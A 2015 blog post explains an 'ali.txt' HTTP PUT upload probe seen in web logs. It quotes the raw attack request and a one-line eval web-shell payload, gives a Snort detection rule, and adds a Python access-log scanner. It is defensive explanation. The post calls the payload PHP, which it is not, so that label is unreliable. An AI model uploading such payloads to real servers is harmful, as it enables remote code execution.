Friday, March 13, 2015

PHP Injection Attempt ali.txt Explained

I posted the basic details here pastebin.com/AqDJrchF but I wanted to go into more detail.

PUT /ali.txt HTTP/1.1
Accept: application/json
Content-Type: application/json
Content-Length: 39
Expect: 100-continue
Connection: Keep-Alive


alihack<%eval request("alihack.com")%>


So it's been around for a while, you may have seen the requests, but what are they trying to do?

1.) First, the evil IP (192.210.60.124) sends the attack request. It's difficult to tell without further research whether this is truly a bad guy's server or a good guy's server that was compromised and is now being used to launch attacks on the attacker's behalf.

2.) Second, an IDS (intrusion detection system) sitting in front of the web server watches requests come in and fires off Snort rules. It triggered on this one because the URL contained '/ali.txt' and it was an HTTP PUT request.

MALWARE-TOOLS BlackSpider Tool ali.txt file upload attempt (1:32875)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"MALWARE-TOOLS BlackSpider Tool ali.txt file upload attempt"; flow:to_server,established; content:"/ali.txt"; http_uri; urilen:8; content:"PUT"; http_method; metadata:impact_flag red, service http; reference:url,virustotal.com/en/file/3b0e2ab93a43db122bc9ba4448cb21c8ae01f18068b15a6e0a71db61fb943ed1/analysis/; classtype:misc-activity; sid:32875; rev:1; )


3.) Third, if the web server has HTTP PUT enabled (which is pretty much unheard of nowadays on the Internet) then you have a major problem, because it means anybody in the world can upload any file they want to your server by running the PUT command.

PUT /ali.txt

4.) Fourth and finally, if the attack successfully uploads the 'ali.txt' file then the file will contain the PHP script below, so that when the attacker makes a call-back to your website/ali.txt they'll see the text 'alihack.com' and know it was successful. In this case I think the general idea is that this truly isn't a bad guy attacking; it's good guys trying to share and create awareness that you shouldn't have HTTP PUT enabled. So check your web server: if you see ali.txt you know you've got issues and need to fix them.

alihack<%eval request("alihack.com")%>
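If there is no IDS in front of your server, the same four steps can be checked after the fact in the web server's access log. The script below is an added example, not part of the original post or of Snort: it re-implements the matching conditions of rule sid:32875 (PUT method, URI containing '/ali.txt', URI exactly 8 bytes long) in plain Python and runs them over a few constructed log lines in the common log format. The IP addresses and timestamps in the sample are made up (RFC 5737 documentation ranges), and a 2xx status on the PUT is used as the sign that the upload was actually accepted.

```python
"""Added example (not from the original post or from Snort): re-implements the
match conditions of Snort rule sid:32875 in plain Python and scans constructed
access-log lines for the ali.txt PUT probe."""
import re
from typing import Optional

# Common log format, e.g.:
# 192.0.2.10 - - [13/Mar/2015:10:15:01 +0000] "PUT /ali.txt HTTP/1.1" 405 213
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)


def parse_line(line: str) -> Optional[dict]:
    """Parse one access-log line into its fields, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def matches_ali_rule(method: str, uri: str) -> bool:
    """Same conditions as the Snort rule: http_method is PUT, the URI
    contains '/ali.txt', and the URI is exactly 8 bytes long (urilen:8)."""
    return method == "PUT" and "/ali.txt" in uri and len(uri) == 8


def upload_succeeded(status: str) -> bool:
    """A 2xx answer to the PUT means the server stored the body: the probe worked."""
    return status.startswith("2")


def scan_log(lines):
    """Return (ip, timestamp, status, succeeded) for every request that
    would have fired the rule."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and matches_ali_rule(rec["method"], rec["uri"]):
            hits.append((rec["ip"], rec["ts"], rec["status"],
                         upload_succeeded(rec["status"])))
    return hits


# Constructed sample log lines (addresses from the RFC 5737 documentation ranges)
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Mar/2015:10:15:01 +0000] "GET /index.html HTTP/1.1" 200 5120',
    '192.0.2.10 - - [13/Mar/2015:10:15:02 +0000] "PUT /ali.txt HTTP/1.1" 405 213',
    '198.51.100.7 - - [13/Mar/2015:11:02:44 +0000] "PUT /ali.txt HTTP/1.1" 201 0',
    '198.51.100.7 - - [13/Mar/2015:11:02:45 +0000] "GET /ali.txt HTTP/1.1" 200 39',
    '203.0.113.5 - - [13/Mar/2015:12:00:00 +0000] "PUT /uploads/ali.txt HTTP/1.1" 405 213',
]

if __name__ == "__main__":
    for ip, ts, status, ok in scan_log(SAMPLE_LOG):
        verdict = "UPLOAD ACCEPTED - check the docroot" if ok else "rejected by server"
        print(f"{ts} {ip} PUT /ali.txt -> {status} ({verdict})")
```

Two things worth noticing when you run it: a 405 means the server refused the PUT and you are fine for that request, while a 201 or 200 means the file is now sitting in your document root, and the follow-up GET for /ali.txt is the attacker's call-back described in step 4. The last sample line does not fire because urilen:8 pins the rule to exactly "/ali.txt"; a probe against a different path would need a looser rule.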

Lock those servers down!

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

4 comments:

  1. This isn't PHP, it's an attack on a Rails stack.